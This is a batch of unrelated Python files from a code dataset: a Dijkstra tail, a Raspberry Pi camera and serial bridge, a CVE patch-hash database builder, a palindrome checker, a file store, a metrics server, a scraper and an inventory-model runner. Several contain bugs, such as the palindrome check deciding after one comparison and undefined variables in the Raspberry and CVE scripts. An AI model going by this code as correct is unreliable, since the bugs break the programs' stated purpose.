cost[min_vertex])\n \n return cost\ng = Graph(9) \ng.graph = [[0, 4, 0, 0, 0, 0, 0, 8, 0], \n [4, 0, 8, 0, 0, 0, 0, 11, 0], \n [0, 8, 0, 7, 0, 4, 0, 0, 2], \n [0, 0, 7, 0, 9, 14, 0, 0, 0], \n [0, 0, 0, 9, 0, 10, 0, 0, 0], \n [0, 0, 4, 14, 10, 0, 2, 0, 0], \n [0, 0, 0, 0, 0, 2, 0, 1, 6], \n [8, 11, 0, 0, 0, 0, 1, 0, 7], \n [0, 0, 2, 0, 0, 0, 6, 7, 0] \n ]; \n \nprint(g.dijkstra(0)) \n ","sub_path":"Graph Theory Algos/Dijkstra.py","file_name":"Dijkstra.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606655761","text":"\nimport urllib.request\nimport urllib3\nimport serial\nimport json\nimport socket\nimport threading\nHOST = ''\nPORT = 8888\n_url = 'http://168.131.152.196/common.php'\n\ndef dispatch_Socket():\n global _conn\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((HOST, PORT))\n s.listen(1)\n while True:\n (_conn, addr) = s.accept()\n global _recieveJsonData\n _recieveData = ''\n _cnt = 0\n while True:\n tmp = _conn.recv(1).decode('utf-8')\n _recieveData += tmp\n if (tmp == '{'):\n _cnt = (_cnt + 1)\n elif (tmp == '}'):\n _cnt = (_cnt - 1)\n if (_cnt == 0):\n break\n if (_recieveData == ''):\n continue\n _recieveJsonData = json.loads(_recieveData)\n funid = _recieveJsonData['_funid']\n if (funid == 9):\n sendMessage()\n funid = (- 1)\n\ndef dispatch_Serial():\n global _ser, _jsonData\n _ser = serial.Serial('/dev/ttyACM0', 9600)\n while True:\n jsonStr = _ser.readline().strip().decode('utf-8')\n if (jsonStr == ''):\n continue\n _jsonData = json.loads(jsonStr)\n funid = _jsonData['_funid']\n if (funid == 10):\n reqSend()\n funid = (- 1)\n\ndef sendMessage():\n _recieveData = ''\n _cnt = 0\n while True:\n tmp = _conn.recv(1).decode('utf-8')\n _recieveData += tmp\n if (tmp == '{'):\n _cnt = (_cnt + 1)\n elif (tmp == '}'):\n _cnt = (_cnt - 1)\n if (_cnt == 0):\n break\n global _jsonData\n if (_recieveData != ''):\n _jsonData = json.loads(_recieveData)\n else:\n _jsonData = ''\n if (_jsonData != ''):\n data = _jsonData['args0']\n global ser\n ser = serial.Serial('/dev/ttyACM0', 9600)\n _sendData = {}\n _sendData['_funid'] = 14\n _sendFunid = json.dumps(_sendData)\n ser.write(_sendFunid.encode('utf-8'))\n ser.write('\\n'.encode('utf-8'))\n _sendData.clear()\n _sendData['args0'] = data\n _jsonData = json.dumps(_sendData)\n ser.write(_jsonData.encode('utf-8'))\n ser.write('\\n'.encode('utf-8'))\n ser.close()\n\ndef reqSend():\n _recieveData = _ser.readline().strip().decode('utf-8')\n global _recieveJsonData\n if (_recieveData != ''):\n _recieveJsonData = json.loads(_recieveData)\n else:\n _recieveJsonData = ''\n if (_recieveJsonData != ''):\n val = _recieveJsonData['args0']\n val = ord(val)\n if (val == 48):\n pic_bin = takeAPhoto()\n _field_dict = {}\n _field_dict['_funid'] = 6\n _field_dict['args0'] = c\n _field_dict['args1'] = pic_bin\n req = urllib3.PoolManager()\n req.request('POST', _url, fields=_field_dict)\n if (val == 49):\n pic_bin = takeAPhoto()\n _field_dict = {}\n _field_dict['_funid'] = 6\n _field_dict['args0'] = o\n _field_dict['args1'] = pic_bin\n req = urllib3.PoolManager()\n req.request('POST', _url, fields=_field_dict)\n\ndef takeAPhoto():\n r = urllib.request.urlopen('http://168.131.151.110:8080/stream/snapshot.jpeg')\n pic_bin = r.read()\n return pic_bin\nthread0 = threading.Thread(target=dispatch_Socket, args=())\nthread1 = threading.Thread(target=dispatch_Serial, args=())\nthread0.start()\nthread1.start()\nthread0.join()\nthread1.join()\n","sub_path":"unipy/output/MyRaspberry.py","file_name":"MyRaspberry.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496941900","text":"import os\nimport subprocess\nimport config, mongodb, sys, re, csv\nfrom unidiff import PatchSet\nfrom collections import defaultdict\nimport logging\nimport linecache\nimport hashlib,time\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='myapp3.log',\n filemode='w')\n#################################################################################################\n#定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\n\ndef clean_generate_folder(path):\n if os.path.exists(path):\n os.system(\"rm -r %s\"%path)\n os.makedirs(path)\n else:\n os.makedirs(path)\n\ndef loadSource(input_folder):\n maxFileSizeInBytes = 2*1024*1024\n srcFileList = []\n for path, dirs, files in os.walk(input_folder):\n for fileName in files:\n ext = fileName.lower()\n if ext.endswith('.c') or ext.endswith('.cpp') or ext.endswith('.cc') or ext.endswith('.c++') or ext.endswith('.cxx'):\n filepath = os.path.join(path, fileName)\n if maxFileSizeInBytes is not None:\n if os.path.getsize(filepath) < maxFileSizeInBytes:\n srcFileList.append(filepath)\n else:\n srcFileList.append(filepath)\n return srcFileList\n\n\ndef removeComment(string):\n c_regex = re.compile(\n r'(?P//.*?$|[{}]+)|(?P/\\*.*?\\*/)|(?P\\'(\\\\.|[^\\\\\\'])*\\'|\"(\\\\.|[^\\\\\"])*\"|.[^/\\'\"]*)',\n re.DOTALL | re.MULTILINE)\n return ''.join([c.group('noncomment') for c in c_regex.finditer(string) if c.group('noncomment')])\n\n\ndef normalize(string):\n return ''.join(string.replace('\\n', '').replace('\\r', '').replace('\\t', '').replace('{', '').replace('}', '').split(\n ' ')).lower()\n\n\ndef abstract(func_infos, index, level):\n originalFunctionBody = func_infos[\"funcBody\"][index]\n originalFunctionBody = removeComment(originalFunctionBody)\n if int(level) >= 0: # No abstraction.\n abstractBody = originalFunctionBody\n if int(level) >= 1: # PARAM\n parameterList = func_infos[\"parameterList\"]\n for param in parameterList:\n if len(param) == 0:\n continue\n try:\n paramPattern = re.compile(\"(^|\\W)\" + param + \"(\\W)\")\n abstractBody = paramPattern.sub(\"\\g<1>FPARAM\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 2: # DTYPE\n dataTypeList = func_infos[\"dataTypeList\"]\n for dtype in dataTypeList:\n if len(dtype) == 0:\n continue\n try:\n dtypePattern = re.compile(\"(^|\\W)\" + dtype + \"(\\W)\")\n abstractBody = dtypePattern.sub(\"\\g<1>DTYPE\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 3: # LVAR\n variableList = func_infos[\"variableList\"]\n for lvar in variableList:\n if len(lvar) == 0:\n continue\n try:\n lvarPattern = re.compile(\"(^|\\W)\" + lvar + \"(\\W)\")\n abstractBody = lvarPattern.sub(\"\\g<1>LVAR\\g<2>\", abstractBody)\n except:\n pass\n if int(level) >= 4: # FUNCCALL\n funcCalleeList = func_infos[\"funcCalleeList\"]\n for fcall in funcCalleeList:\n if len(fcall) == 0:\n continue\n try:\n fcallPattern = re.compile(\"(^|\\W)\" + fcall + \"(\\W)\")\n abstractBody = fcallPattern.sub(\"\\g<1>FUNCCALL\\g<2>\", abstractBody)\n except:\n pass\n return abstractBody\n\n\ndef parsefile_deep_multi(srcFileName):\n javaCallCommand = \"java -Xmx1024m -jar %s %s\" % (config.opt_jar, srcFileName)\n try:\n astString = subprocess.check_output(javaCallCommand, stderr=subprocess.STDOUT, shell=True)\n astString = astString.decode('utf-8')\n except subprocess.CalledProcessError as e:\n logging.error(\"Parser Error: %s\" % str(e))\n astString = \"\"\n delimiter = \"\\r\\0?\\r?\\0\\r\"\n funcList = astString.split(delimiter)\n func_infos = defaultdict(list)\n for func in funcList[1:]:\n elemsList = func.split('\\n')[1:-1]\n if len(elemsList) > 9:\n func_infos[\"parentNumLoc\"].append(int(elemsList[1]))\n func_infos[\"name\"].append(elemsList[2])\n func_infos[\"lines\"].append([int(elemsList[3].split('\\t')[0]), int(elemsList[3].split('\\t')[1])])\n func_infos[\"funcId\"].append(elemsList[4])\n func_infos[\"parameterList\"].append(elemsList[5].rstrip().split('\\t'))\n func_infos[\"variableList\"].append(elemsList[6].rstrip().split('\\t'))\n func_infos[\"dataTypeList\"].append(elemsList[7].rstrip().split('\\t'))\n func_infos[\"funcCalleeList\"].append(elemsList[8].rstrip().split('\\t'))\n func_infos[\"funcBody\"].append('\\n'.join(elemsList[9:]))\n return func_infos\n\n\ndef generate_cli(targetPath):\n absLevel = 4\n logging.info(\"PROJ:%s\" % targetPath)\n logging.info(\"Loading source files... This may take a few minutes.\")\n input_files = loadSource(targetPath)\n function_info_list = defaultdict(list)\n if len(input_files) == 0:\n logging.error(\"Failed loading source files.\")\n logging.error(\"Check if you selected proper directory, or if your project contains .c or .cpp files.\")\n else:\n logging.info(\"Load complete. Generating hashmark...\")\n for file in input_files:\n logging.info(\"[%d/%d]\\t%s\" % (input_files.index(file), len(input_files), file))\n func_infos = parsefile_deep_multi(file)\n for index in range(len(func_infos[\"funcBody\"])):\n absBody = abstract(func_infos, index, absLevel)\n absBody = removeComment(absBody)\n absBody = normalize(absBody)\n funcLen = len(absBody)\n if funcLen > config.function_char_length:\n m = hashlib.md5()\n m.update(absBody.encode('utf-8'))\n hashValue = m.hexdigest()\n function_info_list[\"function_hash\"].append(hashValue)\n function_info_list[\"function_name\"].append(func_infos[\"name\"][index])\n function_info_list[\"function_code\"].append(func_infos[\"funcBody\"][index])\n function_info_list[\"function_location\"].append(func_infos[\"lines\"])\n logging.info(\"finished hashmark...\")\n return function_info_list\n\n\ndef parse_diff(path_to_patch, patch_temp_path):\n _, ext = os.path.splitext(path_to_patch)\n filename_info = {}\n tmp_file = os.path.join(patch_temp_path, 'tmp' + ext)\n with open(tmp_file, 'w+') as w:\n with open(path_to_patch, encoding='utf-8', errors='ignore') as r:\n w.write(r.read())\n patches = PatchSet.from_filename(tmp_file)\n for patch in patches:\n filename = '/'.join(patch.source_file.split('/')[1:])\n if filename[-2:] != '.c' and filename[-4:] != '.cpp' and filename[-4:] != '.cxx':\n continue\n patch_info_commit = patch.patch_info[-1]\n patch_info_processed = patch_info_commit[6:]\n ori_commit = patch_info_processed.split('..')[0]\n fix_commit = patch_info_processed.split('..')[1].split(' ')[0]\n filename_info[filename] = [ori_commit, fix_commit]\n return filename_info\n\n\ndef generate_file(filename_info, repo_path, ori_temp_path, fix_temp_path, CVE_id, proj_name):\n for filename, commits in filename_info.items():\n ori_commit = commits[0]\n fix_commit = commits[1]\n try:\n fix_cmd = 'cd %s && git show %s' % (repo_path, fix_commit)\n fix_output = subprocess.check_output(fix_cmd, shell=True, encoding='utf-8', errors='ignore')\n fix_filename = os.path.join(fix_temp_path, proj_name + '_' + CVE_id + '_' + '%s.c' % fix_commit)\n with open(fix_filename, 'w', encoding='utf-8', errors='ignore') as f:\n f.write(fix_output.rstrip())\n except Exception as e:\n logging.info(\"fix commit cannot find in repo: %s\" % str(e))\n continue\n try:\n ori_cmd = 'cd %s && git show %s' % (repo_path, ori_commit)\n ori_output = subprocess.check_output(ori_cmd, shell=True, encoding='utf-8', errors='ignore')\n ori_filename = os.path.join(ori_temp_path, proj_name + '_' + CVE_id+ '_' + '%s.c' % ori_commit)\n with open(ori_filename, 'w', encoding='utf-8', errors='ignore') as f:\n f.write(ori_output.rstrip())\n except Exception as e:\n logging.info(\"ori commit cannot find in repo: %s\" % str(e))\n continue\n\n\ndef generate_ori_fix_files_by_patchinfo(patch_file, git_repo, CVE_id, proj_name):\n ori_temp_path = os.path.join(config.temp_path, 'ori_files')\n fix_temp_path = os.path.join(config.temp_path, 'fix_files')\n patch_temp_path = os.path.join(config.temp_path, \"patch_file\")\n clean_generate_folder(ori_temp_path)\n clean_generate_folder(fix_temp_path)\n clean_generate_folder(patch_temp_path)\n time.sleep(1)\n try:\n filename_info = parse_diff(patch_file, patch_temp_path)\n logging.info(filename_info)\n if len(filename_info) == 0:\n logging.error(\"parse diff error\")\n return [], []\n generate_file(filename_info, git_repo, ori_temp_path, fix_temp_path, CVE_id, proj_name)\n except Exception as e:\n logging.error(str(e))\n return ori_temp_path, fix_temp_path\n\n\ndef generate_code(location, filename, file_base_dir):\n filepath = os.path.join(file_base_dir, filename)\n start_line = int(location[0])\n end_line = int(location[1])\n return open(filepath).readlines()[start_line:end_line]\n\n\ndef main(patch_file, input_repo, CVE_id, library_id, proj_name):\n logging.info(\"generate ori fix files from patch infos\")\n ori_file_path, fix_file_path = generate_ori_fix_files_by_patchinfo(patch_file, input_repo, cve, name)\n if len(ori_file_path) == 0 or len(fix_file_path) == 0:\n return 0\n ori_files = os.listdir(ori_file_path)\n fix_files = os.listdir(fix_file_path)\n if len(ori_files) == 0 or len(fix_files) == 0:\n return 0\n logging.info(\"using hmark to parse ori fix source files\")\n logging.info(\"ori file ....\")\n ori_document_list = generate_cli(ori_file_path)\n logging.info(\"fix file ....\")\n fix_document_list = generate_cli(fix_file_path)\n if len(ori_document_list) == 0 or len(fix_document_list) == 0:\n return 0\n #save result to db\n logging.info(\"VUL FEATURES\")\n for index in range(len(ori_document_list[\"function_hash\"])):\n if ori_document_list[\"function_hash\"][index] not in fix_document_list[\"function_hash\"]:\n vul_document = {}\n vul_document[\"function_hash\"] = ori_document_list[\"function_hash\"][index]\n vul_document[\"function_name\"] = ori_document_list[\"function_name\"][index]\n vul_document[\"function_code\"] = ori_document_list[\"function_code\"][index]\n vul_document[\"CVE_infos\"] = CVE_id\n vul_document[\"proj_name\"] = proj_name\n vul_document[\"library_id\"] = library_id\n if ori_collection.collection.find({\"function_hash\": vul_document[\"function_hash\"],\n \"CVE_infos\": CVE_id}).count() != 0:\n logging.info(\"exist in DB..........................................\")\n else:\n ori_collection.collection.insert_one(vul_document)\n logging.info(\"add to DB*********************************************\")\n\n logging.info(\"PATCH FEATURES\")\n for index in range(len(fix_document_list[\"function_hash\"])):\n if fix_document_list[\"function_hash\"][index] not in ori_document_list[\"function_hash\"]:\n patch_document = {}\n patch_document[\"function_hash\"] = fix_document_list[\"function_hash\"][index]\n patch_document[\"function_name\"] = fix_document_list[\"function_name\"][index]\n patch_document[\"function_code\"] = fix_document_list[\"function_code\"][index]\n patch_document[\"CVE_infos\"] = CVE_id\n patch_document[\"proj_name\"] = proj_name\n patch_document[\"library_id\"] = library_id\n if fix_collection.collection.find({\"function_hash\": patch_document[\"function_hash\"],\n \"CVE_infos\": CVE_id}).count() != 0:\n logging.info(\"exist in DB..........................................\")\n else:\n fix_collection.collection.insert_one(patch_document)\n logging.info(\"add to DB*********************************************\")\n\n\nori_collection = mongodb.mongodb_synic(host=config.db_host,\n port=config.db_port,\n db_name=config.db_name,\n collection_name=config.db_vul_collection,\n user=config.db_user,\n password=config.db_password,\n auth=config.db_auth)\nfix_collection = mongodb.mongodb_synic(host=config.db_host,\n port=config.db_port,\n db_name=config.db_name,\n collection_name=config.db_patch_collection,\n user=config.db_user,\n password=config.db_password,\n auth=config.db_auth)\n\n\nif __name__ == '__main__':\n with open('cve_repo_patch.csv') as f:\n csvs = csv.reader(f)\n for i, line in enumerate(csvs):\n if i == 0:\n continue\n if line[-1] and line[-2] and line[-3]:\n library_id = line[1]\n name = line[2]\n cve = line[5]\n path = line[7]\n patch = line[8]\n main(patch, path, cve, library_id, name)\n \n\t \n\ndef old_entry():\n CVE_library_id_dict = {}\n with open(config.CVE_id_library_id, 'r') as csvfile:\n reader = csv.reader(csvfile)\n cnt = 0\n for row in reader:\n cnt += 1\n if cnt > 1 and len(row[8]) > 0:\n CVE_library_id_dict[row[5]] = row[1]\n patch_folder = config.input_patch\n repo_folder = config.input_git_repo\n patch_files = []\n ids = os.listdir(config.input_git_repo)\n patch_files = []\n with open(config.decode_error, 'r') as decode_read:\n reader = csv.reader(decode_read)\n cnt = 0\n for row in reader:\n cnt += 1\n if cnt > 1:\n patchfile = os.path.join(patch_folder, row[0])\n if os.path.exists(patchfile):\n patch_files.append(patchfile)\n logging.info(patch_files)\n\n for file in patch_files:\n library_id = file.split('/')[-2]\n input_repo = os.path.join(repo_folder, library_id)\n proj_name = file.split('/')[-1].split('_CVE')[0]\n CVE_id = file.split('/')[-1].split(proj_name)[-1].split('_')[1]\n if os.path.exists(input_repo) and CVE_id in CVE_library_id_dict.keys() \\\n and CVE_id not in ori_collection.collection.distinct(\"CVE_infos\"):\n logging.info(\"[%d/%d] %s | %s | %s | %s\" % (patch_files.index(file), len(patch_files), CVE_id, library_id, proj_name, file))\n main(file, input_repo, CVE_id, library_id, proj_name)\n else:\n continue\n","sub_path":"generate_DB.py","file_name":"generate_DB.py","file_ext":"py","file_size_in_byte":16053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"394390357","text":"\r\ndef isPalindrome(word):\r\n for i in range(0, len(word)):\r\n if word[i] != word[-1-i]:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\nprint('This program will check if your word is a palindrome.\\n')\r\nword = input('Enter a word')\r\n\r\nif isPalindrome(word):\r\n print('Yes it is a palindrome')\r\nelse:\r\n print('No it is not a palindrome')\r\n\r\n\r\n\r\n","sub_path":"misc/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"29839709","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: ofitserov\r\n#\r\n# Created: 27.10.2012\r\n# Copyright: (c) ofitserov 2012\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n#!/usr/bin/env python\r\n\r\nimport os\r\nimport hashlib\r\nimport binascii\r\nimport logging\r\n\r\n_log = logging.getLogger(__name__)\r\n\r\nMAX_FILES = 10\r\n\r\nclass Content(object):\r\n def __init__(self, path):\r\n self.path = path\r\n self.files = []\r\n \r\n def hashBytes(self, bytes):\r\n m = hashlib.md5() #@UndefinedVariable\r\n m.update(bytes)\r\n return m.hexdigest()\r\n\r\n def verifyFile(self, hexHash):\r\n try:\r\n with open(os.path.join(self.path, hexHash)) as f:\r\n contents = f.read()\r\n return self.hashBytes(contents) == hexHash\r\n except IOError:\r\n return False\r\n\r\n def getContentId(self):\r\n self.updateFiles()\r\n m = hashlib.md5() #@UndefinedVariable\r\n for f in self.files:\r\n m.update(f)\r\n return m.digest()\r\n\r\n def updateFiles(self):\r\n self.files = []\r\n for fname in os.listdir(self.path):\r\n fpath = os.path.join(self.path, fname)\r\n if not os.path.isfile(fpath):\r\n continue\r\n if not self.verifyFile(fname):\r\n continue\r\n self.files.append(binascii.unhexlify(fname))\r\n\r\n def get(self, binaryHash):\r\n hexHash = binascii.hexlify(binaryHash)\r\n if not self.verifyFile(hexHash):\r\n return None\r\n try:\r\n with open(os.path.join(self.path, hexHash)) as f:\r\n return f.read()\r\n except IOError:\r\n return None\r\n\r\n def put(self, content):\r\n if len(self.files) >= MAX_FILES:\r\n _log.info('File number limit reached')\r\n return False\r\n hexHash = self.hashBytes(content)\r\n try:\r\n with open(os.path.join(self.path, hexHash), 'w') as f:\r\n f.write(content)\r\n self.files.append(binascii.unhexlify(hexHash))\r\n return True\r\n except IOError:\r\n return False\r\n","sub_path":"storage/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194535413","text":"import asyncio\nfrom collections import namedtuple\nfrom functools import reduce\nfrom enum import Enum, auto\n\n\nMetricEntry = namedtuple('MetricEntry', 'metric_title value timestamp')\n\n\nclass CommandType(Enum):\n put = auto()\n get = auto()\n\n\nclass ClientServerProtocol(asyncio.Protocol):\n event_list: [MetricEntry] = []\n\n def connection_made(self, transport):\n self.transport = transport\n\n def data_received(self, data):\n resp = self.process_data(data.decode())\n self.transport.write(resp.encode())\n\n def process_data(self, command: str) -> str:\n args = command.split()\n if args[0] == CommandType.put.name:\n try:\n metric_title = args[1]\n value = float(args[2])\n timestamp = int(args[3])\n except Exception:\n return self.wrong_command_str\n\n self.event_list.append(MetricEntry(metric_title, value, timestamp))\n return self.ok_command_str\n elif args[0] == CommandType.get.name:\n try:\n metric_title = args[1]\n except Exception:\n return self.wrong_command_str\n\n metric_list = self.get_metric_list(metric_title)\n\n metric_entry_strings = reduce(lambda a, x: a + x + '\\n', map(self.metric_entry_to_string, metric_list), '')\n response = self.wrap_with_ok(metric_entry_strings)\n return response\n else:\n return self.wrong_command_str\n\n def get_metric_list(self, metric_title: str) -> [MetricEntry]:\n if metric_title == \"*\":\n return self.event_list\n else:\n filtered = list(filter(lambda x: x.metric_title == metric_title, self.event_list))\n return filtered\n\n @staticmethod\n def wrap_with_ok(string: str) -> str:\n return f'ok\\n{string}\\n'\n\n @staticmethod\n def metric_entry_to_string(metric_entry: MetricEntry) -> str:\n return f\"{metric_entry.metric_title} {metric_entry.value} {metric_entry.timestamp}\"\n \n @property\n def ok_command_str(self):\n return self.wrap_with_ok('')\n\n @property\n def wrong_command_str(self):\n return \"error\\nwrong command\\n\\n\"\n\n\ndef run_server(host, port):\n loop = asyncio.get_event_loop()\n coro = loop.create_server(\n ClientServerProtocol,\n host, port\n )\n\n server = loop.run_until_complete(coro)\n\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n server.close()\n loop.run_until_complete(server.wait_closed())\n loop.close()\n\n\nif __name__ == '__main__':\n run_server(\"127.0.0.1\", 8181)\n","sub_path":"week05,06/week06_01.py","file_name":"week06_01.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64863141","text":"from .core import *\r\nfrom .utils import *\r\nfrom .vparsers import *\r\n\r\n\r\nclass OrnamentBaseParser(SingleWebpageParser):\r\n url = \"https://mieszkania-ornament.pl/index.php\"\r\n method = \"POST\"\r\n headers = {\r\n \"Host\": \"mieszkania-ornament.pl\",\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\",\r\n \"Accept\": \"text/html, */*; q=0.01\",\r\n \"Accept-Language\": \"en-US,en;q=0.5\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Referer\": \"https://mieszkania-ornament.pl/mieszkania\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Connection\": \"keep-alive\"\r\n }\r\n\r\n schema = [\r\n DataUnit(label=\"Budyenk\", parser=DOMTextExtractor(), id=\"building\"),\r\n DataUnit(label=\"Numer\", parser=DOMTextExtractor(), id=\"number\"),\r\n DataUnit(label=\"Piętro\", parser=FloorParser(DOMTextExtractor()), id=\"floor\"),\r\n DataUnit(label=\"Pokoje\", parser=IntParser(DOMTextExtractor()), id=\"rooms\"),\r\n DataUnit(label=\"Pow.\", parser=AreaParser(DOMTextExtractor()), id=\"area\"),\r\n DataUnit(label=\"Dod. pow.\", parser=AreaParser(DOMTextExtractor()), id=\"_extra_area\"),\r\n DataUnit(label=\"Cena m^2\", parser=NoneParser(), id=\"none\"),\r\n DataUnit(label=\"Cena\", parser=NoneParser(), id=\"none\"),\r\n DataUnit(label=\"Status\", parser=StatusParser(DOMTextExtractor()), id=\"status\"), \r\n DataUnit(label=\"Rzut\", parser=DOMAttrExtractor(\"value\", preparser=DOMElementExtractor(\"input\", 1)), id=\"plan\"),\r\n DataUnit(label=\"Zapytanie\", parser=NoneParser(), id=\"none\")\r\n ]\r\n\r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find_all(\"div\", {\"class\": \"mieszkania-row-body-click\"})\r\n \r\n def split_record(self, record):\r\n return record.find_all(\"div\", recursive=False)\r\n \r\n def modify_record(self, record, soup=None):\r\n record[\"fid\"] = self.create_fid(record)\r\n record[\"plan\"] = self.create_plan_url(record)\r\n self.adjust_areas(record)\r\n return record\r\n \r\n @tryexcept_wrapper((KeyError,), return_value=None)\r\n def create_fid(self, record):\r\n fid_form = \"{building}/{floor}/{number}\"\r\n return fid_form.format(**record)\r\n \r\n def adjust_areas(self, record):\r\n areas = dict(garden=0.0, balcony=0.0)\r\n if record[\"floor\"] == 0:\r\n areas[\"garden\"] = record.get(\"_extra_area\", 0.0)\r\n if record[\"floor\"] > 0:\r\n areas[\"balcony\"] = record.get(\"_extra_area\", 0.0)\r\n record.update(areas)\r\n\r\n @tryexcept_wrapper((KeyError,), return_value=None)\r\n def create_plan_url(self, record):\r\n url_form = \"http://mieszkania-ornament.pl/mieszkania/wyszukaj/{plan}\"\r\n return url_form.format(**record)\r\n\r\n\r\nclass OrnamentParser(OrnamentBaseParser):\r\n data = \"link=mieszkania&link_id=wyszukiwarka_ajax&sortowanie_kolumna=mieszkanie&sortowanie_kierunek=DESC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B4A&budynek%5B%5D=B4B\"\r\n\r\n\r\nclass OrnamentE3Parser(OrnamentBaseParser):\r\n data = \"link=mieszkania&link_id=wyszukiwarka_ajax&sortowanie_kolumna=mieszkanie&sortowanie_kierunek=DESC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B3A&budynek%5B%5D=B3B\"\r\n\r\n# l3 ?sortowanie_kolumna=mieszkanie&sortowanie_kierunek=ASC&metraz_min=&metraz_max=&pokoje_min=&pokoje_max=&budynek%5B%5D=B3A&budynek%5B%5D=B3B\r\n# link mieszkania\r\n# link_id wyszukaj","sub_path":"parsers/ornament.py","file_name":"ornament.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542108773","text":"def time_to_deliver(num_packages, delivery_sequence):\n seq = [[int(kk[:kk.index('-')]),int(kk[kk.index('-')+1:])] for kk in delivery_sequence]\n number = 0\n time = 0\n pos1 = 1\n pos2 = 1\n a = seq[0][0]\n for i in range(num_packages):\n if i == num_packages-1:\n if seq[i][0] == a:\n time+=seq[i][1]-pos1+1\n else:\n time+=seq[i][1]-pos2+1\n break\n if seq[i][0]==a:\n period = seq[i][1]-pos1+1\n time+=period\n pos1 = seq[i][1]\n for j in range(i+1,num_packages):\n if seq[j][0] != a:\n break\n pos2 = min(period+pos2,seq[j][1])\n else:\n period = seq[i][1]-pos2+1\n time+=period\n pos2 = seq[i][1]\n for j in range(i+1,num_packages):\n if seq[j][0] == a:\n break \n pos1 = min(period+pos1,seq[j][1])\n return time\n","sub_path":"InterviewOnlineTest/AkunaQuantDev/[Q4]DroneDeliver.py","file_name":"[Q4]DroneDeliver.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304016224","text":"from scm_optimization.heuristic_models import LA_DB_Model\nfrom multiprocessing import Pool\nfrom random import random\nfrom scm_optimization.model import *\nfrom scipy.optimize import minimize, bisect, minimize_scalar\nfrom dual_balancing_extension.simulation import Hospital_LA_MDP, Hospital_DB_MDP\nimport pandas as pd\nimport pickle\nimport sys\nimport random\nimport argparse\nimport datetime\n\ntime.time()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run LA Experiment parallel runners.')\n parser.add_argument('--outdir', dest='outdir', help='output dir to write in')\n parser.add_argument('-b', dest='backlogging_cost', type=int, help='backlogging cost')\n parser.add_argument('--info', dest='info', type=int, help='info horizon')\n parser.add_argument('--binom_usage_n', dest='binom_usage_n', type=int, help='binom_usage_n')\n parser.add_argument('--pools', dest='pools', type=int, help='num of parallel runners')\n parser.add_argument('--index', dest='pool_num', type=int, help='index of runner, 0 to pools - 1')\n parser.add_argument('-t', dest='t', type=int, help='starting time step')\n\n args = parser.parse_args()\n\n print(args.backlogging_cost)\n\n outdir = args.outdir if args.outdir else \".\"\n backlogging_cost = args.backlogging_cost if args.backlogging_cost else 1000\n info = args.info if args.info else 0\n binom_usage_n = args.binom_usage_n if args.binom_usage_n else 0\n pools = args.pools if args.pools else 2\n pool_num = args.pool_num if args.pool_num else 0\n t = args.t if args.t else 0\n\n usage_model = BinomUsageModel(n=binom_usage_n, p=1 / binom_usage_n) if binom_usage_n else PoissonUsageModel(scale=1,\n trunk=1e-3)\n\n info_state_rvs = [pacal.ConstDistr(0)] * info + \\\n [pacal.BinomialDistr(10, 0.5)]\n if info == 0:\n info_state_rvs = [pacal.BinomialDistr(10, 0.5), pacal.ConstDistr(0)]\n\n gamma = 1\n lead_time = 0\n holding_cost = 1\n setup_cost = 0\n unit_price = 0\n\n model = LA_DB_Model(gamma,\n lead_time,\n info_state_rvs,\n holding_cost,\n backlogging_cost,\n setup_cost,\n unit_price,\n usage_model=usage_model)\n\n prefix = \"DB_Model_b_{}_info_{}\".format(backlogging_cost, info)\n prefix += \"_binomial_usage_{}\".format(binom_usage_n) if binom_usage_n else \"\"\n fn = outdir + '/' + prefix\n if os.path.isfile(fn):\n model = LA_DB_Model.read_pickle(fn + \"_model.pickle\")\n else:\n model.to_pickle(fn)\n print(\"Writing initial model: \", fn)\n\n for t in range(t, 21):\n segments = list(fn + \"_t_{}_seg_{}_model.pickle\".format(t, pool_num) for pool_num in range(pools))\n loading = True\n while loading:\n 